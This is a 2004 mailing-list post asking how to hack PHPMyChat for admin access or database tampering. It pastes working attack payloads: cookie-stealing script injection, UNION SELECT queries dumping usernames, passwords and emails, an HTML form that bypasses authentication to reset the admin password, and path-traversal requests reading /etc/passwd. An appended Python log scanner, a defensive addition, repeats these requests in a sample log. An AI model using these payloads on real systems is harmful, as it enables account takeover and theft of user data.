[HACK] Hack PHPMyChat Vulnerabilities

villalobo at cubatel.cu villalobo at cubatel.cu
Mon Jul 12 20:01:24 CEST 2004


Hello friends... I wonder if there is any way to hack this kind of PHP
chat, that is, PHPMyChat, something to get administrator privileges,
take it down or alter the database, I don't know, something. Look, for
example I have something here, HTML Injection and SQL Injection, something
like that or others. In case anyone is interested, here are the ones I
have.... and tell me if you can help me... some of these don't work for
me... I'm going to post them just as I downloaded them from the web...

Multiple vulnerabilities have been discovered in PHPMyChat, specifically:

- HTML Injection
- SQL Injection
- Authentication Bypass
- File disclosure

More concretely, here are some practical examples:

HTML Injection
Code:
<INPUT TYPE="TEXT" NAME="C" VALUE="#FF0000">[CODE]"> <INPUT TYPE="TEXT"
NAME="C" VALUE="#FF0000"><script>alert(document.cookie)</script><a "">


SQL Injection
Code:
http://www.example.com/chat/usersL.php3?L=russian&R='[SQL]
http://www.example.com/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20username,null,null,null%20FROM%20%20c_reg_users%20/*
http://www.example.com/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20password,null,null,null%20FROM%20%20c_reg_users%20/*
http://www.example.com/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20email,null,null,null%20FROM%20%20c_reg_users%20/*


Authentication bypass
Code:
<HTML> <HEAD> <TITLE>phpMyChat exploit</TITLE> </HEAD> <BODY> <FORM
ACTION="http://[TARGET]/chat/edituser.php3" METHOD="GET"
AUTOCOMPLETE="OFF" NAME="EditUsrForm"> <INPUT type="hidden"
name="FORM_SEND" value="1"> <INPUT type="hidden" name="AUTH_USERNAME"
value="admin"> <INPUT type="hidden" name="AUTH_PASSWORD" value="null">
<!-- INSERT --> <INPUT type="hidden" name="do_not_login" value="false">
<!-- END INSERT --> <INPUT TYPE="hidden" NAME="L" VALUE="russian"> <INPUT
TYPE="text" NAME="U" VALUE="admin">NAME *<BR> <INPUT TYPE="text"
NAME="PASSWORD" VALUE="hex_pass">NEW PASS *<BR> <INPUT TYPE="text"
NAME="FIRSTNAME" VALUE="">FIRST NAME<BR> <INPUT TYPE="text"
NAME="LASTNAME" VALUE="">LAST NAME<BR> <INPUT TYPE="radio" NAME="GENDER"
VALUE="1" >male<BR> <INPUT TYPE="radio" NAME="GENDER" VALUE="2"
>female<BR> <INPUT TYPE="text" NAME="COUNTRY" VALUE="">COUNTRY<BR> <INPUT
TYPE="text" NAME="WEBSITE" VALUE="">WEBSITE<BR> <INPUT TYPE="text"
NAME="EMAIL" VALUE="you at email.ru"> <INPUT type="checkbox" name="SHOWEMAIL"
value="1" >show e-mail in public information<BR> <INPUT TYPE="submit"
NAME="submit_type" VALUE="Change"> </FORM> </BODY> </HTML>


File disclosure
Code:
http://www.example.com/chat/admin.php3?From=admin.php3&What=Body&L=russian&user=[USER]&pswd=[YOU
HASH PASSWORD]&sheet=[FILE]%00
http://www.example.com/chat/admin.php3?From=admin.php3&What=Body&L=russian&user=admin&pswd=[YOU
HASH PASSWORD]&sheet=/../../../../../../etc/passwd%00


Code:
http://www.example.com/chat/admin.php3?From=admin.php3&What=[FILE]%00&L=russian&user=[USER]&pswd=[YOU
HASH PASSWORD]&sheet=1
http://www.example.com/chat/admin.php3?From=admin.php3&What=/../../../../../../etc/passwd%00&L=russian&user=admin&pswd=[YOU
HASH PASSWORD]&sheet=1
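
As an added example (not part of the original post or of phpMyChat), a small Python scanner that flags the request shapes listed above in a web server access log, for sites that still run this software. The log lines, the `PLACEHOLDER` hash, the benign requests and the assumption that a legitimate client never sends `do_not_login` are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Patterns for the request shapes listed in the advisory above.
UNION_SELECT = re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I)
TRAVERSAL = re.compile(r"\.\./|\x00")  # parse_qs has already decoded %00

def first(q, key):
    return q.get(key, [""])[0]

# (label, script name, predicate over the decoded query parameters)
RULES = [
    ("sql-injection", "usersL.php3",
     lambda q: bool(UNION_SELECT.search(first(q, "R")))),
    ("file-disclosure", "admin.php3",
     lambda q: any(TRAVERSAL.search(first(q, k)) for k in ("sheet", "What"))),
    # Assumption: a legitimate client never sends do_not_login itself.
    ("auth-bypass", "edituser.php3", lambda q: "do_not_login" in q),
]

def classify(target):
    """Return the rule labels matched by one request target (path?query)."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    q = parse_qs(parts.query, keep_blank_values=True)
    return [label for label, name, pred in RULES if script == name and pred(q)]

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def scan(lines):
    """Return (line_number, label) for every suspicious access-log line."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if m:
            hits.extend((n, label) for label in classify(m.group(1)))
    return hits

# Constructed sample log (documentation addresses, placeholder hash).
SAMPLE_LOG = """\
192.0.2.10 - - [12/Jul/2004:20:01:24 +0200] "GET /chat/usersL.php3?L=english&R=Lobby HTTP/1.0" 200 1834
203.0.113.7 - - [12/Jul/2004:20:02:01 +0200] "GET /chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20email,null,null,null%20FROM%20%20c_reg_users%20/* HTTP/1.0" 200 912
203.0.113.7 - - [12/Jul/2004:20:02:40 +0200] "GET /chat/admin.php3?From=admin.php3&What=Body&L=russian&user=admin&pswd=PLACEHOLDER&sheet=/../../../../../../etc/passwd%00 HTTP/1.0" 200 2210
203.0.113.7 - - [12/Jul/2004:20:03:05 +0200] "GET /chat/edituser.php3?FORM_SEND=1&AUTH_USERNAME=admin&AUTH_PASSWORD=null&do_not_login=false&L=russian&U=admin HTTP/1.0" 200 640
192.0.2.10 - - [12/Jul/2004:20:04:00 +0200] "GET /chat/admin.php3?From=admin.php3&What=Body&L=english&user=admin&pswd=PLACEHOLDER&sheet=1 HTTP/1.0" 200 3001
""".splitlines()

if __name__ == "__main__":
    for n, label in scan(SAMPLE_LOG):
        print(f"line {n}: {label}")
```

Only GET requests expose their parameters in a standard access log; the same checks applied to POST bodies need request-body logging or a WAF hook.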
